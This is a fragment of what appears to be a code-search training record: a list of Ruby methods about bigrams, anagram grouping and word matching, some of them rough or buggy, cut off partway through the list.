"def count_guess \r\n\t\t@num_guess = @secret_word.length \r\n\t\t@num_guess.times do \r\n\t\t\t@word_length_array << \"_\"\r\n\t\tend \r\n\t\tp @word_length_array\r\n\tend",
"def total_review_character_count\n review_character_counts.inject(:+)\n end",
"def word_sizes(str)\n str.split.map { |element| element.size }.tally\nend",
"def total_score\n return @plays.reduce(0) { |memo, word| memo + Scrabble::Scoring.score(word) }\n end",
"def total_included_words\n included_paragraphs_joined.split(' ').size\n end",
"def digit_count(titles)\n Math.log10(titles.size).to_i + 1\n end",
"def words_count\n get_at_words_count + \n get_ata_words_count + \n get_noun_words_count + \n get_adjective_words_count\n end",
"def total\n @messages.size\n end",
"def total_count\n @_total_count || @_original_array.length\n end",
"def nouns\n i = 0\n @synsets.each do |key, values|\n i += values.length\n end\n i\n end",
"def num_unique_words\n @frequencies.keys.length\n end",
"def total_num_team_reviews\n team_review_counts.inject(:+)\n end",
"def get_adjective_words_count\n @redis.llen(\"store:adjectives\").to_i\n end",
"def number_of_tokens\n result = MONOPOLY_GAME[:tokens].count\n\nend",
"def NumMessages\n Builtins.size(@messages)\n end",
"def total_count #:nodoc:\n total == 1 && !@group.nil? && @group['matches'] > 1 ? @group['matches'] : total\n end",
"def process\n tokenize(text).each do |word|\n token = TfIdfSimilarity::Token.new word\n if token.valid?\n @term_counts[token.lowercase_filter.classic_filter.to_s] += 1\n end\n end\n @size = term_counts.values.reduce(:+)\n end",
"def nonadword_count_total(page)\n\t\tnonadword_urls(page).length\n\tend",
"def count_sentences\n self.split(/[.?!] /).count\n end",
"def number_of_characters\n @text.length\n end",
"def num_words_current\n @active_list.size\n end",
"def total_count\n @all.size\n end",
"def count\n each.size\n end"
] | [
"0.74235284",
"0.6953551",
"0.6816287",
"0.67369366",
"0.6519049",
"0.6369594",
"0.6341712",
"0.6339302",
"0.63020474",
"0.62844026",
"0.6257695",
"0.62269944",
"0.62049586",
"0.62049586",
"0.61644775",
"0.6141836",
"0.61363196",
"0.613448",
"0.6115112",
"0.61092526",
"0.6082771",
"0.6039322",
"0.60027415",
"0.60024273",
"0.5997999",
"0.59970737",
"0.5989174",
"0.5989174",
"0.59691185",
"0.5968823",
"0.59273285",
"0.5926488",
"0.59087324",
"0.59087324",
"0.589645",
"0.5892114",
"0.58898544",
"0.5886808",
"0.58812994",
"0.5865959",
"0.58637565",
"0.58532894",
"0.5841185",
"0.5826518",
"0.58051115",
"0.57972765",
"0.5789224",
"0.57756364",
"0.5773864",
"0.576874",
"0.5763513",
"0.5759799",
"0.5756394",
"0.5752119",
"0.5746703",
"0.5743082",
"0.5740471",
"0.5738745",
"0.57209754",
"0.5709864",
"0.57049215",
"0.5700713",
"0.56864905",
"0.5685794",
"0.5676849",
"0.5665305",
"0.5662922",
"0.56620795",
"0.56537986",
"0.5649441",
"0.5643879",
"0.56360567",
"0.56311566",
"0.56211215",
"0.5620876",
"0.5618085",
"0.5615476",
"0.56139976",
"0.56030154",
"0.5590893",
"0.55880386",
"0.55819273",
"0.5581312",
"0.55785143",
"0.5577249",
"0.55642396",
"0.5561957",
"0.5558195",
"0.55568546",
"0.55563295",
"0.555255",
"0.5552157",
"0.5549392",
"0.55471516",
"0.55443305",
"0.55415785",
"0.55301297",
"0.5522936",
"0.5521773",
"0.55183935",
"0.5517697"
] | 0.0 | -1 |
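Several negatives in the row above count word lengths either with a default-zero Hash or with Enumerable#tally; a minimal sketch contrasting the two idioms (plain Ruby; tally needs Ruby 2.7 or newer):

sentence = "bravo charlie delta echo"

counts = Hash.new(0)
sentence.split.each { |word| counts[word.size] += 1 }
counts # => {5=>2, 7=>1, 4=>1}

sentence.split.map(&:size).tally # => {5=>2, 7=>1, 4=>1}

Both forms build the same frequency map; tally is simply the shorter modern idiom.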
Get a list of second words of bigrams matching the given first word. | def matching_bigrams(word1)
list = @index[word1]
list.map{ |word2| @table[[word1,word2]] }
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_bigrams(string)\n s = string.downcase\n v = []\n (s.length-1).times{ |i|\n v[i] = s[i...i+2]\n }\n return v\n end",
"def find_bigrams(str, bigrams)\n bigrams.select { |bigram| str.include?(bigram)}\nend",
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def gen_bigrams(a)\n bigrams = a.zip(a[1..-1])\n bigrams.pop # remove last useless one [lastitem, nil]\n return bigrams\nend",
"def find_ocurrences(text, first, second)\n text = text.split(' ')\n \n word_output = []\n \n text.each_with_index do |word, index|\n next if index == 0 || index == 1\n \n word_output << word if text[index - 1] == second && text[index - 2] == first\n end\n \n word_output\nend",
"def next_words_for(word) \n if word.nil? or word.empty?\n generator_names \n else\n name_of_last_generator_inverse = word[-1].swapcase\n generator_names.find_all{|name| name != name_of_last_generator_inverse }.map{|name| word + name }\n end\n end",
"def search_for (word)\n\n chars = word.split(\"\")\n all_words = chars.permutation(chars.size).map{|_chars|\n _chars.join \"\"\n }\n\n anagrams = []\n all_words.each do |w|\n anagrams.push w if @word_list[w]\n end\n\n return anagrams\n end",
"def word_unscrambler(str, words)\n str = str.split('').sort.join('')\n possible = []\n words.map do |word|\n sort_word = word.split('').sort.join('')\n possible << word if word_c == str\n end\n return possible\nend",
"def best_match(given_word)\n words = (@word_list.is_a? Array) ? @word_list : @word_list.keys\n\n word_bigrams = bigramate(given_word)\n word_hash = words.map do |key|\n [key, bigram_compare(word_bigrams, bigramate(key))]\n end\n word_hash = Hash[word_hash]\n\n # Weight by word usage, if logical\n word_hash = apply_usage_weights(word_hash) if @word_list.is_a? Hash\n\n word_hash.max_by { |_key, value| value }.first\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def extract_names(content)\n names = []\n \n # Split content into words.\n words = content.split(/[^-_a-z0-9]+/i).select {|v| v.index(/^[-a-z]+$/i)}\n \n # Loop over each bigram and check if the words are title cased and if at\n # least one of the words is a first or last name.\n words.each_with_index do |first_name, index|\n surname = full_surname = words[index+1] || ''\n \n # Skip to the next word if we have a couple of the next words.\n if ['van', 'von'].index(surname)\n surname = words[index+2] || ''\n full_surname = \"#{full_surname} #{surname}\"\n end\n \n # Only look at two words that are titlecase and neither one is a stopword.\n next if !first_name.titlecase? || !surname.titlecase?\n next if !stopwords.index(first_name.upcase).nil? || !stopwords.index(surname.upcase).nil?\n \n # Check if either the first name or last name is a recognized common name.\n if Matlock::Data.first_name?(first_name) || Matlock::Data.surname?(surname)\n full_name = \"#{first_name} #{full_surname}\"\n names << full_name if names.index(full_name).nil?\n end\n end\n \n return names\n end",
"def find_solution(first_word, second_word)\n\tif first_word.length != second_word.length\n\t\treturn \"bad input, words must be the same length\"\n\tend\n\n\tcurrent_word = first_word\n\t$chain << first_word\n\n\twhile true\n\t\tpossible = words_1_letter_diff(current_word)\n\t\tpossible = possible - $seen\n\t\tif possible.include?(second_word)\n\t\t\treturn $chain << second_word\n\t\tend\n\n\t\tif possible != []\n\t\t\t$chain << possible.last\n\t\t\t$seen << possible.last\n\t\t\tcurrent_word = $chain.last\n\t\telse\n\t\t\tbacktrack()\n\t\t\tcurrent_word = $chain.last\n\t\tend\n\n\t\tif $chain == []\n\t\t\treturn \"impossible\"\n\t\tend\n\n\t\tif $chain.last == second_word\n\t\t\treturn $chain\n\t\tend\n\tend\nend",
"def every_possible_pairing_of_word(arr)\n i1 = arr\n i2 = []\n i1.combination(2).to_a\nend",
"def each_word_pair\n words.each_cons(2) { |array| yield(array[0],array[1]) }\n end",
"def print_two_words\n \"#{@array_to_split[0]} and #{@lastword}\"\n end",
"def alternate_words(s)\nwords = s.gsub(/[!@$%^&*()-=_+:;,.<>?\\|]/ , ' ').split\n#removing all symbols and spliting the words. Setting variable to words\nfirst = words.sort\n#sorting the words\nprint first[0..2]\n#print the first 0 to 2 indexes\n\n\nend",
"def scan\n $stderr.print \"[bigrams] \"\n\n last = nil\n\n bigram_files.each do |file|\n $stderr.print \".\"\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t if last && good_bigram?(word)\n add(last, word, file)\n\t\t end\n\t\t last = word\n else\n last = nil\n end\n end\n last = nil\n end\n last = nil\n end\n\n $stderr.puts\n end",
"def num_matching(one_bigrams, two_bigrams, acc = 0)\n return acc if one_bigrams.empty? || two_bigrams.empty?\n\n one_two = one_bigrams.index(two_bigrams[0])\n two_one = two_bigrams.index(one_bigrams[0])\n\n if one_two.nil? && two_one.nil?\n num_matching(one_bigrams.drop(1), two_bigrams.drop(1), acc)\n else\n # If one is nil, it is set to the other\n two_one ||= one_two\n one_two ||= two_one\n\n if one_two < two_one\n num_matching(one_bigrams.drop(one_two + 1),\n two_bigrams.drop(1), acc + 1)\n else\n num_matching(one_bigrams.drop(1),\n two_bigrams.drop(two_one + 1), acc + 1)\n end\n end\n end",
"def match(possible_anagrams)\nresult = []\nsplitted_word = @word.downcase.split(\"\").sort\n\npossible_anagrams.each do |element|\nif splitted_word == element.downcase.split(\"\").sort\n result << element\nend \nend\nresult\nend",
"def mcw(word)\n\tif $bigrams.has_key? word\n\t\tmax = 0\n\t\tkeys = []\n\t\t$bigrams[word].each do |key, count|\n\t\t\tif count > max\n\t\t\t\tkeys = [key]\n\t\t\t\tmax = count\n\t\t\telsif count == max\n\t\t\t\tkeys << key\n\t\t\tend\n\t\tend\n\n\t\tif keys.length > 1\n\t\t\treturn keys[Random.rand(keys.length)]\n\t\telse\n\t\t\treturn keys[0]\n\t\tend\n\tend\n\treturn \"\"\nend",
"def word_unscrambler(str, words)\n str_letters = str.split(\"\").sort\n\n res = []\n words.each do |word|\n word_letters = word.split(\"\").sort\n res << word if str_letters == word_letters\n end\n\n res\nend",
"def subwords(word, dictionary)\r\n res = []\r\n substrings(word).each do |ele|\r\n res << ele if dictionary.include?(ele)\r\n end\r\n res\r\nend",
"def combine_anagrams(words)\n final = []\n first_word = ''\n b = ''\n words.each_with_index do |word_a, i|\n first_word = word_a.downcase.split('').sort\n final << [word_a]\n words.each_with_index do |word_b, j|\n if word_a == word_b\n else\n if first_word == word_b.downcase.split('').sort\n final[i] << word_b\n words.delete(word_b)\n else\n end\n end\n end\n end\n return final\nend",
"def load_bigrams\n bigrams = []\n\n begin\n sql = \"SELECT bigram_id, word1, word2, count FROM Bigrams;\"\n stm = @db.prepare sql\n rs = stm.execute\n\t\t while (row = rs.next) do\n\t\t id, w1, w2, c = *row\n\t\t bigrams << Bigrams.new(w1, w2, :count=>c, :id=>id)\n\t\t end\n ensure\n stm.close\n end\n\n begin \n sql = \"SELECT file_path, file_count FROM BigramFiles WHERE bigram_id = ?\"\n stm = @db.prepare sql\n\n\t\t bigrams.each do |b|\n\t\t rs = stm.execute(b.id)\n\t\t files = {}\n\t\t while (row = rs.next) do\n\t\t path, count = *row\n\t\t files[path] = count\n\t\t end\n\t\t b.files = files\n\t\t end\n ensure\n stm.close\n end\n\n return bigrams\n end",
"def one_off_words(str,word_list)\n result = []\n better_list = word_list.select{|word| word.size == str.size}\n better_list.each do |word|\n i = 0\n count = 0\n while i < word.size\n count += 1 if word[i] == str[i]\n i += 1\n end\n result << word if word.size - count == 1\n end\n result\nend",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def test_words(words, last_word)\n repetitions = []\n\n words.each do |w|\n w = w.downcase\n repetitions.push(w) if w == last_word\n last_word = w\n end\n\n [repetitions, last_word]\nend",
"def find_anagrams( words )\r\n\tif words.empty?\r\n\t\tresult = []\r\n\telse\r\n\t\tresult = []\r\n\t\tsource = words[0]\r\n\t\twords.each do |w|\r\n\t\t\tif are_anagrams?( source, w )\r\n\t\t\t\tresult << w\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\t\r\n\treturn result\r\nend",
"def match(word_array)\n results = []\n word_array.each do |word|\n results << word if word.split(\"\").sort == @word.split(\"\").sort\n end\n results\n end",
"def match(array_possible_anagrams)\n matching_words=[]\n word_broken=self.word.split(\"\").sort\n array_possible_anagrams.each do |possible_match|\n #possible_match=possible.word\n possible_match_broken=possible_match.split(\"\").sort\n if possible_match_broken == word_broken\n matching_words << possible_match\n else\n end #end of if\n end #end of do\n matching_words\n end",
"def common_ngrams_from_words(words)\n ngrams_from_words(words).select { |ngram| has_ngram?(ngram) }\n end",
"def alternate_words(wrd)\n result = []\n counter = 0\n wrd_2 = wrd.gsub(/[!@$#%^&*()-=_+\\[\\]:;,.\\/<>?\\|]/, \" \")\n words = wrd_2.split(/\\s+/)\n words.each do |word|\n result << word if counter % 2 == 0\n counter += 1\n end\n return result\nend",
"def word_unscrambler(word, dictionary)\nresult = []\ndictionary.each do |entry|\n\tif entry.split(\"\").sort.join(\"\") == word.split(\"\").sort.join(\"\")\n\t\tresult << entry\n\tend\nend\nresult \nend",
"def each_word_pair_v1\n words.each_con(2) {|array| yield array[0],array[1]}\n end",
"def combine_anagrams(words)\n result = []\n words.each do |word|\n anagrams = words.find_all{|item| item.downcase.chars.sort.join == word.downcase.chars.sort.join }\n result.push(anagrams)\n end\n result.uniq\nend",
"def scramble_words(words)\n first_word = words[0]\n last_word = words[-1]\n alphabetically = words[1, (words.size - 2)].chars.sort\n alphabetically.unshift(first_word).push(last_word).join\nend",
"def query(word)\n node = @the_node\n results = []\n word.split(\"\").each do |letter|\n next_node = node[letter]\n if next_node != nil\n node = next_node\n next\n else\n return ['']\n end\n end\n results << Word.new(word, node.final)\n results += get_childs(node).map{|s| Word.new(word) + s}\n results.select{|r| r.final}.map{|r| r.to_s }\n end",
"def next_words(word, data_subsets)\n total_chars = word.length\n last_six = word[(total_chars - CUT_WORD_LENGTH)..(total_chars)]\n exp = Regexp.new(\"^#{last_six}\")\n\n result = []\n\n hash_key = last_six.match(/.../).to_s\n data_subset_for_word = data_subsets[hash_key]\n return [] if data_subset_for_word.nil?\n\n data_subset_for_word.each do |compared_word|\n if compared_word.match(exp)\n if compared_word != word\n result << compared_word\n end\n end\n end\n result\nend",
"def word_unscrambler(str, words)\n result = []\n dictionary = words\n scrambled = str\n #words = words.sort! ###\n\n words.each do |word|\n #puts \" word.split = #{word.split}\" ########\n test = word.split\n test = test[0]\n puts \"test = #{test}\" ########\n #puts \"test.split = #{test.split}\" ######\n end\n\n\n puts \"dictionary = #{dictionary}\"\n puts \"scrambled = #{scrambled}\"\n #result = test ####\n\n return result\nend",
"def match(possible_anagrams)\n anagrams = []\n possible_anagrams.each do |possible_anagram|\n if possible_anagram.split(\"\").sort == @word.split(\"\").sort\n anagrams << possible_anagram\n end\n end\n anagrams\nend",
"def get_words\n @sentences.each_index do |i|\n s = @sentences[i]\n words = s.split(' ')\n words.each do |w|\n word = w.gsub(WORD_SANITIZE, '').downcase\n if belongs_to_known_abbreviations? word\n add_word_to_result(word, i)\n else\n add_word_to_result(word.gsub(DOT_SANITIZE, ''), i)\n end\n end\n end\n end",
"def scramble_words(words)\n words.split(' ').map { |word| scramble(word) }.join(' ')\nend",
"def find_anagrams(target_word, array_of_words)\n array_of_anagrams = []\n\n array_of_words.each do |member|\n if member.split(//).sort == target_word.split(//).sort\n array_of_anagrams.push(member)\n else\n next\n end\n end\n array_of_anagrams\nend",
"def get_bigrams_internal(word, *args)\n http_method = :get\n path = '/word/{word}/phrasesInternal'\n path.sub!('{word}', word.to_s)\n\n # Ruby turns all key-value arguments at the end into a single hash\n # e.g. Wordnik.word.get_examples('dingo', :limit => 10, :part_of_speech => 'verb')\n # becomes {:limit => 10, :part_of_speech => 'verb'}\n last_arg = args.pop if args.last.is_a?(Hash)\n last_arg = args.pop if args.last.is_a?(Array)\n last_arg ||= {}\n\n # Look for a kwarg called :request_only, whose presence indicates\n # that we want the request itself back, not the response body\n if last_arg.is_a?(Hash) && last_arg[:request_only].present?\n request_only = true\n last_arg.delete(:request_only)\n end\n\n params = last_arg\n body ||= {}\n request = Wordnik::Request.new(http_method, path, :params => params, :body => body)\n request_only ? request : request.response.body\n end",
"def combine_anagrams(words)\n Array anagrams = []\n words.each {|x|\n flag = false\n anagrams.collect {|y|\n if x.downcase.chars.to_a.sort == y[0].downcase.chars.to_a.sort then\n y << x\n flag = true\n break\n end\n }\n unless flag; anagrams << [x] end \n }\n anagrams\nend",
"def compare(word1, word2)\n bigram_compare(bigramate(word1), bigramate(word2))\n end",
"def mcw(search)\n\t\tif !$bigrams.has_key?(search) # if the search word doesn't exist in the bigram...\n\t\t\tmost_common = nil # we're going to return nil.\n\n\t\telse most_common = $bigrams[search].max_by{|word, number| number}[0] # search for max by # of maxes\n\t\tend\n\n\t\treturn most_common\nend",
"def combine_anagrams(words)\r\n\tanagrams = find_anagrams( words )\r\n\tif anagrams.empty?\r\n\t\tresult = []\r\n\telse\r\n\t\tnewWords = words - anagrams\r\n\t\tresult = [anagrams] + combine_anagrams(newWords)\r\n\tend\r\n\t\r\n\treturn result\r\n\t\r\nend",
"def first_wa(array)\n new_array = [ ]\n other_new_array = [ ]\n \n array.each do |word|\n new_array << word.to_s\n end\n new_array.each do |word|\n if word.include?(\"wa\") == true\n then other_new_array << word\n end\n end\n other_new_array.first\nend",
"def combine_anagrams(words)\n groups = []\n words.each { |word|\n inserted = false\n groups.each { |item|\n if word.isAnagram(item[0])\n item << word\n inserted = true\n end\n }\n if ! inserted\n list = []\n list << word\n groups << list\n end\n }\n return groups\nend",
"def combine_anagrams(words)\r\n words.group_by{|w| w.downcase.chars.sort.to_s}.values\r\nend",
"def combine_anagrams(words)\n\tresult = []\n\twords.each do |word|\n\t\ttemp_word = sort_letters(word)\n\t\tis_found = false\n\t\tresult.each do |grouped_array|\n\t\t\tif !false and sort_letters(grouped_array.last) == temp_word\n\t\t\t\tgrouped_array << word\n\t\t\t\tis_found = true\n\t\t\tend\n\t\tend\n\t\tresult << [word] if !is_found\n\tend\n\tresult\nend",
"def word_splits(string, is_sub_string = false)\n if is_sub_string\n splits = nil\n else\n splits = [[string]]\n end\n search_range(string, 3).each do |pos|\n\n part_1 = string[0..pos]\n part_2 = string[(pos + 1)..-1]\n\n is_word_1 = @dictionary.is_word?(part_1)\n is_word_2 = @dictionary.is_word?(part_2)\n\n if is_word_1 && is_word_2\n if is_sub_string\n return [part_1, part_2]\n else\n splits << [part_1, part_2]\n end\n elsif is_word_1\n split_2 = word_splits(part_2, true)\n unless split_2.nil?\n if is_sub_string\n return [part_1, split_2].flatten\n else\n splits << [part_1, split_2].flatten\n end\n end\n end\n\n end\n splits\n end",
"def combine_anagrams(list_of_words)\n result = []\n list_of_words.each { | word |\n found = false \n for added_words in result\n if word.anagrams?(added_words[0])\n added_words << word\n puts \"==>#{added_words}\"\n found = true\n break \n end \n end\n #Add the new anagram group list\n if !found then result << [word] end\n }\n return result\nend",
"def mcw(word)\n\t\tmostCommonWord = ''\n\t\tvalue = 0\n\t\t#determines if a word in a hash happens the most\n\t\t#p $bigrams[word]\n\t\t$bigrams[word].each do |x|\n\t\t\tif x[1] > value\n\t\t\t\tmostCommonWord = x[0]\n\t\t\t\tvalue = x[1]\n\n\t\t\t#if two hashes have the same value, then randomly chooses between the two\n\t\t\telsif x[1] == value\n\t\t\t\tchoice = Random.rand(2)\n\t\t\t\tif choice == 1\n\t\t\t\t\tmostCommonWord = x[0]\n\t\t\t\t\tvalue = x[1]\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn mostCommonWord\n\tend",
"def scramble_words(words)\n words.split.map do |word|\n scramble_word(word)\n end.join(' ')\nend",
"def anagrams(word, words)\n word = word.chars.sort\n words.select{|x| x.chars.sort == word}\nend",
"def combine_anagrams(words)\n\n output = []\n \n words.each do |w|\n \n anag = []\n rest = []\n head = w.downcase.scan(/./).sort.join\n regexp = \"\\\\b\"+head+\"\\\\b\"\n \n words.each do |word|\n \n if Regexp.new(regexp,true) =~ word.downcase.scan(/./).sort.join\n anag = anag + [word]\n else\n rest = rest + [word] \n end\n \n end\n \n if not output.include? anag\n output << anag\n end\n\n end\n \n return output\n \nend",
"def each_word_pair\n word_array = words\n index = 0\n while index < word_array.size\n yield word_array[index], word_array[index+1]\n index += 1\n end\n end",
"def combine_anagrams(words)\n @results = []\n word_bins = words.group_by { |word| word.length }\n word_bins.values.map { |sublist| \n sublist = sublist.zip(sublist)\n sublist.map { |wordpairs| wordpairs[0] = wordpairs[0].downcase.chars.sort.join }\n # collect unique keys for this sublist:\n keys = sublist.collect { |list| list[0] }.uniq\n # print \"keys: \", keys, \"\\n\"\n keys.each do |key| \n anagrams = sublist.collect { |list| list[0] == key ? list[1] : nil }\n anagrams.compact!\n @results << anagrams\n # print \"anagrams= \", anagrams, \"\\n\"\n end\n # print sublist.length, \": \", sublist, \"\\n\\n\" \n }\n # print \"final results: \", @results, \"\\n\"\n @results\nend",
"def words_1_letter_diff(word)\n\treturn words_of_same_length(word).find_all {|w| compare_words(word, \tw) == 1}\nend",
"def combine_anagrams(words)\n words.group_by {|w| w.downcase.chars.sort {|a,b| a <=> b}.to_s}.values\nend",
"def combine_anagrams(words)\n anagrams = []\n available_words = words\n words.each do |e|\n group = []\n temp_words = []\n anagram_invariant = e.downcase.chars.sort.join\n available_words.each do |i|\n test = i.downcase.chars.sort.join\n if test == anagram_invariant\n group.push(i)\n else\n temp_words.push(i)\n end\n end\n if(!group.empty?)\n anagrams.push(group)\n end\n available_words = temp_words\n end\n return anagrams\nend",
"def unscramble(scramble)\n $word_list.select { |a| a.chars.sort == scramble.chars.sort }\nend",
"def combine_anagrams(words)\r\n\t\r\n\tresult = []\r\n\twords1 = [];\r\n\twords.each {|w| words1 << w.to_s.downcase.chars.sort.join}\r\n\twords2 = words1.uniq\r\n\t\r\n\tfor i in 0 ... words2.size\r\n\t\tr = []\r\n\t\tw2 = words2[i]\r\n\t\tfor j in 0 ... words.size\r\n\t\t\tw = words[j]\r\n\t\t\tif w2.casecmp(w.to_s.downcase.chars.sort.join) == 0\r\n\t\t\t\tr << w\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult << r\r\n\tend\r\n\t\r\n\treturn result\r\n\t\r\nend",
"def string2wordsFromBeg(string, wordsAlreadyParsed=[])\n\n if ($debug > 1)\n puts \"string2wordsFromBeg: string(#{string}) words(#{wordsAlreadyParsed})\"\n end\n\n # If this string is a word, just return it with any words already parsed.\n if isWord(string)\n wordsAlreadyParsed.push(string)\n return wordsAlreadyParsed\n end\n\n # Else divide the string into two parts, and if the 2nd part is a word, keep going.\n # Use min and max word lengths to skip checking substrings that cannot be words.\n if string.length >= $MaxWordLength + $MinWordLength\n maxLength = $MaxWordLength;\n else\n maxLength = string.length - $MinWordLength;\n end\n length = $MinWordLength;\n while (length < maxLength)\n substr = string[0..length]\n length += 1\n if isWord(substr)\n wordsAlreadyParsed.push(substr)\n moreWords = string2wordsFromBeg(string[length..999], wordsAlreadyParsed)\n if moreWords\n return moreWords\n end\n end\n end\n return nil # string did not completely parse into words\nend",
"def create_index2(word)\n word.each_char.map {|c| CHAR_MAP[c.downcase]}.reduce(:*)\n end",
"def anagrams(word, words)\n sorted_test_word = word.chars.sort.join\n sorted_words = words.map do |word|\n word.chars.sort.join\n end\n\n anagram_locations = sorted_words.map.with_index do |word, index|\n if word == sorted_test_word\n index\n end\n end.compact\n # sorted_words.keep_if.with_index {|word, index| word == sorted_test_word}\n anagrams = []\n anagram_locations.each do |location|\n anagrams << words[location]\n end\n anagrams\nend",
"def words_starting_with_un_and_ending_with_ing(text)\n result = text.scan(/\\bun\\w+/) + text.scan(/ing\\b\\w+/)\n result.uniq\nend",
"def best_next_word(set, goal)\n set.to_a[0]\n end",
"def match(anagram_ary)\n match_ary = []\n anagram_ary.each do |anagram|\n if word.split('').sort == anagram.split('').sort\n match_ary << anagram\n end\n end\n match_ary\n end",
"def split(text)\n text.downcase.scan(WORDS).uniq\n end",
"def anagrams(word, words)\n words.select { |w| w.chars.sort == word.chars.sort }\nend",
"def combine_anagrams(words)\n\toutput = Array.new # function result\n\twords.each do |word|\n\t\tsorted = word.upcase.chars.sort.join\n\t\tprint sorted, ' '\n\t\tgroup = output.find {|g| sorted == g[0].upcase.chars.sort.join}\n\t\tif not group\n\t\t\tgroup = []\n\t\t\toutput.push group\n\t\tend\n\t\tgroup.push word\n\tend\n\toutput\nend",
"def word_combos(word)\n\t\tword = word.chars.to_a\n\t\tall_word_combo = []\n\t\ti = 1\n\t\twhile i <= word.size\n\t\t\tall_word_combo << word.permutation(i).to_a\n\t\t\ti+=1\n\t\tend\n\t\treturn all_word_combo\n\tend",
"def combine_anagrams(words)\n\n\twords.group_by{|word| word.downcase.chars.sort}.values\n\t\nend",
"def combine_anagrams(words)\n result = Array.new\n words.each do |i|\n anagrams = Array.new\n sorted = i.downcase.chars.sort.join\n words.each do |j|\n if j.downcase.chars.sort.join == sorted\n anagrams << j\n end\n end\n result << anagrams\n end\n return result.uniq\nend",
"def combine_anagrams(words)\n output = []\n if words.length == 0\n return output\n end\n words.each do |item|\n s_string = item.downcase.chars.sort.join.to_s\n temp_arry = []\n words.each do |scan|\n if s_string == scan.downcase.chars.sort.join.to_s\n temp_arry << scan\n end\n end\n if output.include?(temp_arry)\n #do nothing\n else\n output << temp_arry\n end\n end\n return output\nend",
"def combine_anagrams(words)\n groups = Hash.new\n words.each do |word|\n (groups[word.downcase.chars.sort.join] ||= []) << word\n end\n groups.flatten.values_at(* groups.flatten.each_index.select {|i| i.odd?})\nend",
"def find_anagrams(base, words_list)\n words_list.select { |word| word.split('').sort == base.split('').sort }\nend",
"def find_anagrams(base, words_list)\n words_list.select { |word| word.split('').sort == base.split('').sort }\nend",
"def get_runs(word)\n word.squeeze.chars.sort.join\n end",
"def get_matches(word)\n cur = self\n word.each_char do |character|\n modified_char = @@vowels.include?(character) ? '*' : character\n return Set.new if not cur.kids.has_key? modified_char\n cur = cur.kids[modified_char]\n end\n cur.words_here\n end",
"def combine_anagrams(words)\n words_hash = Hash.new{ |hash, key| hash[key] = [] }\n words.each { |word| word_key = word.downcase.chars.sort.join; words_hash[word_key] = words_hash[word_key] << word; }\n words_list = Array.new()\n words_hash.keys.each { |key| words_list << words_hash[key] }\n return words_list\nend",
"def combine_anagrams(words)\r\n\tanagrams = words.group_by { |word| word.chars.sort }.values\t\r\nend",
"def alternate_words(sentence)\n\tnew = []\n \n'!@$#%^&*()-=_+[]:;,./<>?\\\\|'.split(//).each do |x|\n sentence = sentence.gsub(x, ' ')\n end\n \n var = sentence.split() \n var.each_with_index {|x,y| new.push x if y.even?}\n\treturn new\nend",
"def get_word_results(word, label=nil)\n return [word]\n end",
"def stem_tokens(tokens)\n stem_list = []\n\n # Looping through the list and finding the stem word for each word\n for word in tokens\n word = word[/\\w*/]\n s = word.stem\n stem_list.push(s)\n end\n\n return stem_list\nend",
"def similar_two(str, best_dist = 2)\n best_pair = str.first(2)\n # Arbitrarily large distance\n best_so_far = str.map(&:length).max * 42\n\n str.combination(2).each do |a, b|\n next if a.length != b.length\n\n dist = Levenshtein.distance(a, b)\n\n return [a, b] if dist == best_dist\n\n if dist < best_so_far\n best_pair = [a, b]\n best_so_far = dist\n end\n end\n\n best_pair\n end",
"def combine_anagrams(words)\n\n ouArr = Array.new\n\n words.each do |w|\n\n ouIt = Array.new [w]\n\n words.each do |w2|\n if w.downcase.chars.sort == w2.downcase.chars.sort && !ouIt.include?(w2)\n ouIt.push(w2)\n end\n end\n ouIt.sort!\n\n if !ouArr.include?(ouIt)\n ouArr.push(ouIt)\n end\n end\n ouArr\nend",
"def combine_anagrams(words)\r\n\tswords = Array.new\r\n\tnoDups = Array.new\r\n\tgroupWords = Array.new\r\n\tanagrams = Array.new\r\n\twords.each {|word| swords << word.downcase.chars.sort.join}\r\n\tswords.each{|word| noDups << word unless !noDups.index(word).nil? }\r\n\tnoDups.each do|tword|\r\n\t\t\t\t\t\r\n\t\t\t\t\tgroupWords = Array.new\r\n\t\t\t\t\twords.each {|word| groupWords << word unless word.downcase.chars.sort.join != tword}\r\n\t\t\t\t\tanagrams << groupWords\r\n\t\t\t\tend\r\n\t\t\t\t\r\n\treturn anagrams\r\nend",
"def alternate_words(string)\n\tary = []\n\tword_ary = string.clean.split(/ /)\n\tword_ary.each_index do |idx|\n\t\tary.push(word_ary[idx]) if idx.even?\n\tend\n\tary\nend",
